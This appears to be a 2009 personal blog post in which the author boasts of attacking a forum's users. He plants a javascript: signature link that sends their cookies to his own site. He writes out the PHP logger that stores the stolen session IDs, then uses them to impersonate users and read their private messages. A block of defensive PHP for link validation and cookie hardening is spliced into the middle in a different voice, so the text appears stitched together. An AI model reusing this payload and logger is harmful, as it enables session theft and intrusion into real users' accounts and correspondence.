Tuesday, August 11, 2009

Third Attack: XSS, Cookie Hijack and Cookie Manipulation

Despite the title, it really was a single attack. After almost a whole month of learning the ways of XSS (not CSS) and cookie hijacking, I started creating my own attacks. At first I thought XSS was an unbeatable prodigy, but after a while I realized it's nothing more than embedding a script written in JavaScript. Here are a few really good references for it:

Even if you don't want to read much, I recommend the last one: it explains a good attack on the LA-PD's site, available for anyone.

Many things can be accomplished using XSS, but I wanted session hijacking. After reading about it in several places, I understood what I needed: a place where I could run this simple JavaScript expression:


document.cookie

That's a property which holds all of the user's cookies for the site. I had to save its value to a file I could read, using a script anyone could reach. I found that writing this

'>

into a search box on Lamer echoed some HTML code back to me as text. I discovered this by typing every special character I could think of into the search box. So I thought, what about adding another attribute there, like:

' text='document.cookie'>

But it wasn't that simple, and the struggle began. After several days studying the ones on the cheat sheet I came up with a pretty good XSS string, but every apostrophe I used got a / sign before it after pressing the search button, so my code became unusable and uninterpretable. I had almost given up every hope I had when I found this. A harmless little trick. I found out from it that by typing javascript:my_javascripts_script into the URL bar, the script is executed in the context of the last site visited. It was browser-dependent though.

I went to my user page and gave the following value to an input (I think it was my signature; it's written in BB-code):

[link=javascript:window.location = "http://www.mysite.com/myscript.php?"+document.cookie]You need to visit this[/link]

And it worked. Clicking the link went to:

http://www.mysite.com/myscript.php?sitename=SinistraD%3A%3A%3A%here_was_a_hash_from_my_password; SiteNameCookieExpire=1250088989; PHPSESSID=2f65b91d6f8a72d1d5128f8afb8f67a7

This worked only if the javascript: was placed at the very beginning of the input; otherwise somewhere (maybe on the server) an http:// was prepended, breaking the whole thing, because http://javascript: no longer worked. So there was protection, but it had that little bug: it didn't kick in when the input started with it. Thanks to that, my script ran. The only thing left was to implement myscript.php. Here's the code:


<?php
$f = fopen("sessionids.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
fclose($f);
header("Location: http://www.youtube.com/watch?v=wzqi1bfflDg");
?>

It saves the request URL, then redirects somewhere else, so the user won't get suspicious. After my setup was ready, I removed it from my profile and posted it on the forum, in a topic where this was expected (links to other sites, funny and/or interesting references, mostly on YouTube).

I didn't have to wait long; many users fell into the trap, and the last thing left was to use their cookies. I logged in with my own user, removed every cookie except the one containing the session ID, then replaced its value with one of the captured ones. "Surprisingly", the result was that I wasn't myself any more, but the user who had clicked the link. The task with the highest priority was to write a mail to the administrator using that account (not mine), but I had to hurry, because when you log in the real user is logged out automatically, and when he logs back in he gets a new session ID, making mine useless.
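The two weaknesses this post walks through, a link filter that only prepended http:// and a session cookie readable from document.cookie, both have standard fixes on the server side. Here is an added defensive example written for this post (it is not the forum's code and not the author's); the names safe_link_href(), render_link_tag() and on_successful_login() are assumed, and it relies only on PHP's built-in parse_url(), session ini settings and session_regenerate_id().

```php
<?php
// Added defensive example for this post (not the forum's code).
// Assumed names: safe_link_href(), render_link_tag(), on_successful_login().

// Validate a [link=...] target by its scheme instead of prepending "http://".
// Returns the URL if it is http(s) with a host, otherwise null.
function safe_link_href(string $raw): ?string
{
    // Drop ASCII control characters and spaces: browsers ignore them inside a
    // scheme, so "java\tscript:" would otherwise pass a naive prefix check.
    $url = preg_replace('/[\x00-\x20\x7f]+/', '', $raw);
    if ($url === null || $url === '') {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false) {
        return null;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    // javascript:, data:, vbscript: and scheme-less input are all rejected here,
    // so where the "javascript:" sits in the string no longer matters.
    if (!in_array($scheme, ['http', 'https'], true) || empty($parts['host'])) {
        return null;
    }
    return $url;
}

// Render the BB-code link; an invalid target is dropped and only the text is shown.
function render_link_tag(string $href, string $text): string
{
    $safeText = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    $safeHref = safe_link_href($href);
    if ($safeHref === null) {
        return $safeText;
    }
    return '<a href="' . htmlspecialchars($safeHref, ENT_QUOTES, 'UTF-8') . '" rel="nofollow">'
        . $safeText . '</a>';
}

// Session cookie hardening, set before session_start(): HttpOnly keeps PHPSESSID
// out of document.cookie, so an injected script cannot read it at all.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');
session_start();

// On login, issue a fresh session ID so an ID captured or fixated earlier stops working.
function on_successful_login(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
}
```

For the signature link from this post, safe_link_href() returns null, so render_link_tag() emits only the escaped link text; the http:// URL to myscript.php itself would still pass, which is why the HttpOnly flag is the second half of the fix.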

I had quite a lot of fun reading their personal messages, stored in the mail system offered by the site. It's just a PM system, not an e-mail one.

This attack was my biggest accomplishment so far. But by this time I was already thinking about implementing a stand-in for myself: a fast robot that surfs without me, a click-fraud bot.
